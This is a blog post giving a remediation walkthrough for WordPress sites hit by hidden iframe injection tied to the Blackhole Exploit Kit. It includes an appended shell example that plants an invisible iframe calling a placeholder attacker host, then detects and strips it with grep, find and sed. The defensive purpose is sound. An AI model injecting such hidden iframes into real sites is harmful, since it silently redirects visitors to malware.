The Invisible IFrame Attack

Recently I have seen many postings about the “Blackhole Exploit Kit” and the “Invisible IFrame Attack” on various forums, anti-virus software vendor websites and other resources.

Through my work in IT security I have dealt with this kind of “attack” before, and looking at what has been posted on the sources I have seen so far, I would like to share a few thoughts on the matter.

What is the “Blackhole Exploit Kit” / “Invisible IFrame Attack” and why do I get warnings about it?

Mostly you get a warning from your anti-virus software telling you that a malicious item was found in the browser cache. The names for this threat vary. From my experience I can tell that I often found the malicious code to be called “HTML/TwitScroll.B”, a name that tells you a bit more about what is going on than just calling it “Blackhole Exploit Kit”.

Blackhole is a metaphor for how this attack works. In very few cases is it your site that is actually hosting the malware; instead your visitors get “redirected” to a website that hosts it, as if they had come too close to a black hole and been transported through a vortex to a place they never intended to go.

Often the black hole itself is code that has been added to your website. If you look at the source code of your website you will find items that should not be there; when it is reported as “HTML/TwitScroll.B” this is often a hidden iframe that appears several times in your website code.

The screenshot below shows some example code of an infected website. The destination of the attack has been blurred to avoid abuse of this resource.

[Screenshot: code added by attacker.]

As soon as your browser accesses a website that contains this code, the virus scanner on your system identifies the website as infected. This happens either because the scanner interfaces directly with the browser and recognises the code being loaded, or because the browser sooner or later caches the source code of the website to speed up future visits, at which point the “live protection” is triggered.

The aftermath of the attack

I mainly dealt with this issue on WordPress websites. If you inspect such sites you will notice that unwanted code has been added to almost ALL files on your system. For JavaScript files (*.js or *.min.js) the attackers are even smart enough to use JavaScript in order to get their code onto your pages. You could compare this behaviour with a virus adding its code to files on your local system; this time it is just happening in a web-server environment.

I would like to point out that the warning you are getting is the AFTERMATH of the attack. The attack itself may have been initiated through different ways of compromising your server environment. This means it is vital that you investigate how the code got there instead of just doing a “clean install” of your website from a backup you took a while ago. If you just re-install your website without removing the initial issue, it will take a few days and the same issue will re-occur. If it is not the same issue, the attackers might do other things with your compromised environment.

If you challenge the attackers, make sure that you have the proper arms.

I am not going to tell you precisely what to do; I can only give you suggestions on how to tackle the problem. Web environments are never the same and your server configuration might require different steps than the systems I worked on. However, I can tell you the steps I take.

I leave it up to you whether you leave the system online or not. Personally I would suggest putting it into maintenance mode. This is often simply done by replacing the index.php/index.html in the server document root with a maintenance notice of your choice, rather than having visitors land on your main page and potentially get virus warnings.


1. Take a full backup of the compromised install

You might be thinking that this step is easy. However, I would like to remind you that your virus scanner will not permit you to write any files matching the malicious signature to your hard drive. In order to work efficiently I use a Linux system for this kind of work. You can install Linux in a virtual machine or have a dedicated Linux machine running.

To take the backup I FTP into the server and copy all content on the server to a directory on my system. I usually document cases for later reports and analysis, so I name the main directory after the case name / case id, and in there I create a subdirectory called “infected”.

Your anti-virus software should have given you sufficient information on what to look for. Basically I open one of the files that were reported as troublesome and check whether the iframe (or other code) that I previously saw in the website source is present. You can now be sure that your website code has been modified. Still, you do not know what has happened.


2. Analyse your log files

There are various tools and websites that let you analyse server logs; this includes FTP access logs as well as HTTP server access logs. You might find out how the malicious code was added. If you are running WordPress, some old plugin/theme code may have been used; if you are running the Hermes theme you might still be using an insecure and outdated “timthumb.php”, which REALLY can cause issues. In some cases you might have updated items that reverted security patches you made to your code. There are many possible reasons and I cannot cover them all here.


3. Lock out the attackers

I have seen many of these attacks run from Asian or African countries, though of course proxies might be used. However, proxy or not, I am rather radical about keeping attackers out. If some countries open doors for attackers and show little effort to deal with them, I lock out visitors from those areas. I do this through .htaccess deny rules. If you are working for a customer you should check that they are fine with people getting locked out. On smaller websites you often work with people who have no plans to do business with such countries and therefore do not mind having them locked out.


4. Eliminate the security issue

As long as you do not know the security issue that let attackers have their fun with your content, it is pointless to repair the site and upload it again. The first priority is to remove any security issue; if you are unsure what might have happened you should seek help. Do not take the fact that your website has been hacked too lightly: the results that get your attention are only the tip of the iceberg.

If you had a diary as a child, imagine you noticed that the little padlock that should keep your secrets safe from unwanted readers has been forced open. You know that somebody has gained access to your data, but you cannot know for sure how far they read. The same applies to your website: you know what kind of data you are hosting there, and I know many people who use their web servers to store more sensitive things than what is visible to a reader of the website.


5. Clean the website content

Depending on the system you are running you might either want to do a clean install (keep in mind to check whether your security patches get overwritten!) or clean the content of the items that have been added. Most of you would be daunted by the thought of a high number of modified files. Depending on the website it could be hundreds of single pages that were modified to contain the hidden iframe code. At this point most anti-virus companies would tell you to purchase their product or use their online services in order to get the items cleaned. This even happens when you are desperate and asking for urgent help. Even though I am looking for work in my sector of IT security right now, I will not tell you to send me funds to look at your issue. I will be giving you hands-on advice from my professional perspective.

When it comes to cleaning the site content you might be thinking of something like “search and replace” as it can be done in software like Notepad++ and other text editors. This idea is good! However, we have to keep in mind that our Windows system is reporting viruses on the files that we need to “clean”, and just putting them into quarantine or having them deleted is NOT what we want. I STRONGLY encourage you NOT TO STOP your anti-virus software on the Windows system just to clean the website. While you are cleaning the website other malicious items could hit your computer, and with security switched off more of your data is at risk.

Remember that I mentioned a Linux system before? Something like “search and replace” is available there too, and even better, it is done on the terminal and works very well. The command we are looking for is “sed”, and we will be combining it with the “find” command.

First of all you want to duplicate the folder “infected” to a folder called “cleaned”, so that you have an “infected” folder and a “cleaned” folder which both contain the very same infected version of your website.

So basically what the command shown below does is find all files with the extension *.php; the output of the find command is used as the list of input files for sed, so that sed searches each file for the string we defined and replaces it with … nothing. This means that we iterate through the content of all directories and sub-directories, look for files with the extension php and have the iframe code deleted. The same is repeated for every variation of the code that the attacker added.

[Screenshot: the find and sed commands used for cleaning.]
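The triage check from step 1 and the find/sed cleaning pass above, carried out end to end on a constructed sample site. This is an added example and not the post's own command; it assumes GNU sed (for `-i`), and `attacker.invalid` is a placeholder host, not a real injection target.

```shell
#!/bin/sh
# Added example, not from the original post: build a constructed "infected" tree with a
# hidden iframe in several files, list the files that carry it, copy the tree to "cleaned",
# strip the injected markup with find + sed, and confirm that nothing is left behind.
# Assumes GNU sed; "attacker.invalid" is a placeholder, not a real attacker host.
set -e

WORK="${WORK:-$(mktemp -d)}"
# Exactly the markup to remove; anchoring on the observed host keeps the rule narrow.
STRIP_RE='<iframe[^>]*attacker\.invalid[^>]*></iframe>'
# Broader pattern for the triage pass: any iframe styled so the visitor cannot see it.
HIDDEN_RE='<iframe[^>]*(visibility: *hidden|display: *none|height="?[01]"?)'

make_sample() {
  inj='<iframe src="http://attacker.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>'
  mkdir -p "$WORK/infected/wp-content/themes/demo"
  printf '<?php get_header(); ?>\n%s\n' "$inj" > "$WORK/infected/index.php"
  # Injection appended to an existing line, so a whole-line delete would destroy real markup.
  printf '</body>%s\n</html>\n' "$inj" > "$WORK/infected/wp-content/themes/demo/footer.php"
  printf '<?php // untouched file\n' > "$WORK/infected/wp-login.php"
}

# Triage: print the files that contain an invisible iframe (the "what to look for" step).
list_hidden_iframes() { grep -rlE "$HIDDEN_RE" "$1" 2>/dev/null || true; }

# Clean: duplicate the tree and run sed over every php/html/js file that find returns.
clean_tree() {
  rm -rf "$WORK/cleaned" && cp -R "$WORK/infected" "$WORK/cleaned"
  find "$WORK/cleaned" -type f \( -name '*.php' -o -name '*.html' -o -name '*.js' \) \
    -exec sed -i -e "s#$STRIP_RE##g" {} +
}

# Verify: number of files still matching; should be 0 after cleaning, else repeat with
# the next variation the attacker used.
count_hits() { list_hidden_iframes "$1" | wc -l | tr -d ' '; }

make_sample
clean_tree
echo "infected: $(count_hits "$WORK/infected") file(s); cleaned: $(count_hits "$WORK/cleaned") file(s)"
```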

Once you think you are through with the cleaning, you can transfer the folder to your Windows device or any other computer running virus scanner software. Scan the “cleaned” directory for issues, preferably with the anti-virus software that previously gave you findings on the infected version of the code. From experience you will still find a few infected files; take a look at them on the Linux system to extract the code the attacker injected, then run the commands again to clean. Repeat this step until your cleaned folder is no longer reported to contain malicious files.

6. Upload the cleaned content

Congratulations, you have reached the point where all added code should have been removed from your website code. You have also fixed the security hole that permitted the attacker to modify your content, and you may have taken steps to lock out certain countries from accessing your website. Now is the moment to re-upload your content. Again, please make sure that all relevant security fixes you have made are present in the “cleaned” folder; if not, please apply them PRIOR to uploading the content to your web server.

The last step is to check that the website is running as before. You can simply navigate to your website and see if everything is as it was. If you were getting virus warnings before which are now gone, be happy. As a matter of caution you should change passwords, as we do not know how much of your data has leaked. You can also use online resources to have your website checked for security issues.

Please note that it takes some days before online anti-virus providers will mark your website as no longer vulnerable. That is nothing you can change, unless the anti-virus provider has a system that lets you request a re-scan of your site.

A few final words…

This is just one approach to tackling the issue. It has proven to be useful and easy and can be used as a standardised approach for removing havoc from your precious web content. I understand that this approach might not whet everyone's appetite.

If you are still worried after reading this you can leave me a message at felixtechie@tormail.org and I will see if I can help you or not. You are also welcome to comment on this post. Please note that comments are moderated and will not appear before I approve them.

I do not take any responsibility for damage resulting from following the advice given in this post or other posts on my blog. I am not responsible for damage resulting from the use of third-party software or the content of other websites.
